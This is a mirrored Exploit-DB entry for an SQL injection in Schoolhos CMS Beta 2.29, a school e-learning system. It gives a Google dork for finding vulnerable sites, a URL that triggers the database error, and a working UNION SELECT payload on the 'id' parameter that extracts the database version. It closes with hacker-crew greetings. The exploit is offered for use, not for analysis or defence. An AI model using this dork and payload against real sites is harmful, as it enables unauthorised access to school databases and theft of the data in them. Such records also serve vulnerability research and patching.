Schoolhos CMS Beta 2.29 – ‘id’ SQL Injection

  • 作者: Cumi
    日期: 2012-10-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/22157/
  • # Exploit Title: Schoolhos CMS SQL Injetions
    # Google Dork: intext:Schoolhos Free Open Source CMS
    # Date: 22 Oktober 2012
    # Exploit Author: Cumi++
    # Vendor Homepage: http://schoolhos.com/
    # Version: Beta 2.29
    # Tested on: Ubuntu 12.04
    # =======================================================
    
    Descripcion : Schoolhos is an education and e-learning CMS, have used by more school..
    
    http://127.0.0.1/schoolhost/index.php?p=info&id='3
    Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/me/public_html/coretan\tema\hijau\konten.php on line 219
    
    Exploit:
    
    SQL : SQL injection
     http://127.0.0.1/schoolhost/index.php?p=info&id='3'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--Cumi++
    
    ========================================================
    Its first time..
    Salam Rusuh...
    Indonesian Coder, Indonesian Hacker, Pekanbaru Cyber..
    
    Tembilahan Coder Crew.
    When A Code Can Change The World